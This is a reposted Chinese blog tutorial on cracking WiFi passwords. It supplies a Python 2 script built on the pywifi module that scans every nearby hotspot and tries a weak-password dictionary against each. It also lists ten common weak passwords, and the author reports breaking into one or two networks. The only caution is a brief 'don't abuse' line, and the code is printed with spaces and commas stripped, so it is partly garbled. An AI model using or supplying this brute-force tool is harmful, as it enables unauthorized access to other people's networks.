未加星标

WiFi密码怎么破?一个Python脚本搞定

字体大小 | |
[开发(python) 所属分类 开发(python) | 发布者 店小二04 | 时间 2017 | 作者 红领巾 ] 0人收藏点击收藏
WiFi密码怎么破?一个python脚本搞定

一点号编程派6小时前

「短暂」的春节假期已经结束了,想必今天大家都已经开工了。新的一年,一起继续学习 Python,鸡年雄起~~

本文仅供大家参考,不要滥用哦。

原文:https://my.oschina.net/Apathy/blog/821039

环境准备

python 2.7

凑合的 linux

差不多的无线网卡

pywifi模块

弱口令字典

清除系统中的任何 wifi 连接记录 \ (非常重要 \ ! \ ! \ ! \ )

首先,这个模块在 win 下有点鸡肋,作者在调用 WLANAPI 时没有做好 WLANSECURITYATTRIBUTES 的封装,所以推荐在 linux 下跑,我测试所使用的是 Kali 2.0 自带 python 2.7.6 ,可直接通过 pip install pywifi 安装。

导入模块

这里用的模块就这三个。pywifi 的 wifiutillinux.py 脚本的 sendcmdtowpas 方法中的 if reply != b'OK\n':判断需要修改,不然会有很多的提示信息。

frompywifiimport*

importtime

importsys

字典准备

效率很重要,毕竟这东西跑起来可真慢,下面是天朝用的比较多的 wifi 弱口令 TOP 10:

12345678

123456789

88888888

1234567890

00000000

87654321

66668888

11223344

147258369

11111111

配置扫描器

推荐扫描时常可以设置在15-20秒之间。测试时常则可以自定义,考虑到认证速度于距离的关系,我一般设置在15左右,再久的也没意义。到时候就算破解成功的热点,信号也好不到哪里

defmain:

#扫描时常

scantimes=3

#单个密码测试延迟

testtimes=15

output=sys.stdout

#结果文件保存路径

files="TestRes.txt"

#字典列表

keys=open(sys.argv[1],"r").readlines

print"|KEYS %s"%(len(keys))

#实例化一个pywifi对象

wifi=PyWiFi

#选择定一个网卡并赋值于iface

iface=wifi.interfaces[0]

#通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置

scanres=scans(ifacescantimes)

#统计附近被发现的热点数量

nums=len(scanres)

print"|SCAN GET %s"%(nums)

print"%s\n%-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s \n%s"%("-"*706"WIFIID"18"SSID OR BSSID"2"N"4"time"7"signal"10"KEYNUM"10"KEY""="*70)

#将每一个热点信息逐一进行测试

forixinenumerate(scanres):

#测试完毕后,成功的结果讲存储到files中

res=test(nums-iifacexkeysoutputtesttimes)

ifres:

open(files"a").write(res)

扫描周围热点

defscans(facetimeout):

#开始扫描

face.scan

time.sleep(timeout)

#在若干秒后获取扫描结果

returnface.scan_results

热点测试

这里后续推荐将扫描过程数据入库,防止重复扫描,且更加直观。

deftest(ifacexkeystuts):

#显示对应网络名称,考虑到部分中文名啧显示bssid

showID=x.bssidiflen(x.ssid)>len(x.bssid)elsex.ssid

#迭代字典并进行爆破

fornkinenumerate(key):

x.key=k.strip

#移除所有热点配置

face.remove_all_network_profiles

#讲封装好的目标尝试连接

face.connect(face.add_network_profile(x))

#初始化状态码,考虑到用0会发生些逻辑错误

code=10

t1=time.time

#循环刷新状态,如果置为0则密码错误,如超时则进行下一个

whilecode!=0:

time.sleep(0.1)

code=face.status

now=time.time-t1

ifnowts:

break

stu.write("\r%-*s| %-*s| %s |%*.2fs| %-*s | %-*s %*s"%(6i18showIDcode5now7x.signal10len(key)-n10k.replace("\n""")))

stu.flush

ifcode==4:

face.disconnect

return"%-*s| %s | %*s |%*s\n"%(20x.ssidx.bssid3x.signal15k)

returnFalse

案例

这里显示本次测试使用了11个弱口令,并扫描到了20个热点,然后开始坑爹的跑起来了

_ * WIFIID * _ 热点的 id 号 每跑一个会减1

_ * SSID OR BSSID * _ 热点的 ssid 名或 mac 地址

_ * N * _ 对热点的连接状态,这个在

* _time_ * 当前所花去的时间

* _signal_ * 热点的信号强度,若小越好

* _KEYNUM_ * 测试密码的 id 每跑一个会减1

* _KEY_ * 当前测试的密码


WiFi密码怎么破?一个Python脚本搞定

结果还不错,各位的安全意识不像以前那么蛋疼了,扫出一两个,其中一个还是自家的 - -

传送门

后台回复关键词 wifi,即可获取相关字典、源码和模块的分享链接。

题图:pexels,CC0 授权。

本文开发(python)相关术语:python基础教程 python多线程 web开发工程师 软件开发工程师 软件开发流程

主题: PythonWiFi数据天大CUUTWLAN
分页:12
转载请注明
本文标题:WiFi密码怎么破?一个Python脚本搞定
本站链接:http://www.codesec.net/view/530084.html
分享请点击:


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 开发(python) | 评论(0) | 阅读(60)